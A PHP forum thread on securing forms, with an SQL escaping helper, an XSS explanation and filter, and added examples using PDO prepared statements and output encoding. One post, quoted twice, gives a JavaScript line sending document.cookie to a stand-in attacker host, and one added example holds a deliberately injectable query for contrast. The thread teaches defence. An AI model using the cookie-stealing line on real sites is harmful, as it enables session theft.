
Security PHP & Forms


Mutley

Recommended Posts

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.[/quote]


More or less yes :)
But you need to make sure that magic_quotes is turned off, because otherwise the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use stripslashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

[code]<?php

// Escape a value for use inside a quoted SQL string literal.
// Note: mysql_real_escape_string() needs an open MySQL connection (it uses
// the last one opened); without one it emits a warning and returns false,
// so call this only after mysql_connect().
function sql_quote($value)
{
    // If magic_quotes_gpc has already added backslashes, remove them first;
    // otherwise the value would be escaped twice.
    if (get_magic_quotes_gpc())
        $value = stripslashes($value);

    // Prefer the connection-aware escape; fall back to addslashes() when the
    // mysql extension is not loaded.
    if (function_exists("mysql_real_escape_string"))
        $value = mysql_real_escape_string($value);
    else
        $value = addslashes($value);

    return $value;
}

?>[/code]

Orio.
https://forums.phpfreaks.com/topic/23449-security-php-forms/#findComment-106409
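As an added example (not Orio's code and not from this thread), here is the same idea taken one step further: with a prepared statement the value is bound separately from the SQL text, so no escaping step (and no magic_quotes handling) is needed at all. The DSN, credentials and the `users` table with `username` and `email` columns are assumed placeholders; PHP 7 or later with PDO is assumed. Note that the mysql_* extension was removed in PHP 7 and get_magic_quotes_gpc() in PHP 8, so the helper above will not run on current PHP anyway.

```php
<?php
// Added example: parameterised lookup with PDO, for contrast with a query
// that splices user input into the SQL text.
// Assumptions: a MySQL database reachable via the DSN below with a table
// `users` (columns `username`, `email`); connection details are placeholders.

$dsn  = 'mysql:host=localhost;dbname=example_db;charset=utf8mb4';
$user = 'db_user';      // placeholder
$pass = 'db_password';  // placeholder

$pdo = new PDO($dsn, $user, $pass, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // let the server bind the parameters itself
]);

// Vulnerable form (for contrast only): the input becomes part of the SQL text,
// so a quote character in the input ends the string literal early and the
// rest of the input is parsed as SQL.
function find_user_unsafe(PDO $pdo, string $username): array
{
    $sql = "SELECT username, email FROM users WHERE username = '$username'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe form: the statement is sent with a placeholder and the value is bound
// separately, so quotes or comment sequences in the input are plain data.
function find_user_safe(PDO $pdo, string $username): array
{
    $stmt = $pdo->prepare('SELECT username, email FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Typical form handling: no stripslashes()/escaping step is required.
$username = $_POST['username'] ?? '';
foreach (find_user_safe($pdo, $username) as $row) {
    // Output still has to be encoded for HTML; that is a separate concern (XSS).
    echo htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

With `PDO::ATTR_EMULATE_PREPARES` set to false the parameters travel to MySQL in the binary protocol rather than being quoted client-side, so the connection character set (set via `charset=utf8mb4` in the DSN) cannot cause a mismatch between how PHP and the server interpret the bytes.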

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, it's beginning to get quite common. It works like this:
1. The user gets redirected to the hacker's page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information.
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
https://forums.phpfreaks.com/topic/23449-security-php-forms/#findComment-106417

[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]

No. For that you would have to do something like this: [code]<?php
// Neutralise script tags and script URL schemes in a string before it is
// written into HTML.
function filter_xss($t)
{
    // Decode existing entities so the checks below see the plain characters.
    $t = html_entity_decode($t, ENT_QUOTES);
    // Turn tag delimiters into numeric entities.
    $t = str_replace("<", "&#60;", $t);
    $t = str_replace(">", "&#62;", $t);
    // Re-encode double quotes (they are literal characters after the decode).
    $t = str_replace('"', htmlspecialchars('"'), $t);
    // Normalise numeric entities: drop leading zeros and force the closing ';'.
    $t = preg_replace("/&#0*([0-9]*);?/", '&#\\1;', $t);
    // Undo the entity-encoded spelling of "javascript:" so the next line catches it.
    $t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;', 'javascript:', $t);
    // Break script URL schemes (the inline comments keep the literal out of this source).
    $t = preg_replace("/javascript:/i", "nojava"/*&#97;v&#97;*/."script:", $t);
    $t = preg_replace("/vbscript:/i", "novb"/*&#98;*/."script:", $t);
    return $t;
}
?>[/code]

More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention
https://forums.phpfreaks.com/topic/23449-security-php-forms/#findComment-106428
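As an added example (not Daniel0's code and not from this thread), covering both of his posts above, the cookie-harvesting redirect and the filter snippet: instead of rewriting dangerous substrings in the input, encode each value for the place it is written to, accept a user-supplied link only if its scheme is on a short allowlist, and mark the session cookie HttpOnly so that `document.cookie` does not expose it even if an XSS hole is found later. The functions `h()`, `safe_href()` and `start_hardened_session()` and the sample inputs are constructed for this example; PHP 7.3 or later (for the array form of `session_set_cookie_params()`) and a UTF-8 HTML page are assumed.

```php
<?php
// Added example, not code from the thread. Output encoding plus a scheme
// allowlist for links, and an HttpOnly session cookie.
// Assumptions: PHP 7.3+, the page is HTML served as UTF-8 over TLS.

// Encode text for an HTML element body or a quoted attribute value.
// ENT_QUOTES also encodes the single quote, so the result is safe inside
// single-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead
// of returning an empty string.
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept a user-supplied link only if it parses as an absolute http(s) URL.
// Anything else (javascript:, vbscript:, data:, a relative path, or an
// unparseable string) is replaced by a harmless anchor, so there is no list
// of bad scheme spellings to maintain.
function safe_href(string $url): string
{
    $scheme = parse_url(trim($url), PHP_URL_SCHEME);
    if ($scheme === null || $scheme === false) {
        return '#';
    }
    if (!in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '#';
    }
    return $url; // still pass through h() when writing it into an attribute
}

// A session cookie flagged HttpOnly is not visible to document.cookie, so the
// cookie-harvesting script quoted above receives an empty string for it.
// 'secure' => true assumes the site is served over TLS.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

start_hardened_session(); // must run before any output is sent

// Constructed sample inputs standing in for $_GET / $_POST values.
$samples = [
    'comment' => 'Tom said: "5 < 6" & that\'s <b>true</b>',
    'website' => 'javascript:void(0)',          // rejected by safe_href()
    'profile' => 'https://example.org/~mutley', // accepted by safe_href()
];

echo '<p>', h($samples['comment']), "</p>\n";
echo '<a href="', h(safe_href($samples['website'])), '">website</a>', "\n";
echo '<a href="', h(safe_href($samples['profile'])), '">profile</a>', "\n";
```

The comment sample renders as `&lt;b&gt;true&lt;/b&gt;` rather than as a bold tag, the `javascript:` link becomes `href="#"`, and the https link is kept but still encoded. Encoding on output rather than filtering on input also means the stored value stays intact, which matters when the same data is later written somewhere other than HTML.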

[quote author=Daniel0 link=topic=110976.msg449426#msg449426 date=1160418859]
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, it's beginning to get quite common. It works like this:
1. The user gets redirected to the hacker's page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information.
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
[/quote]

Very nice, Daniel0.

Here is an article from Developer Fusion on [url=http://www.developerfusion.co.uk/show/4656/]SQL injection[/url].

Good luck,
Tom
https://forums.phpfreaks.com/topic/23449-security-php-forms/#findComment-106432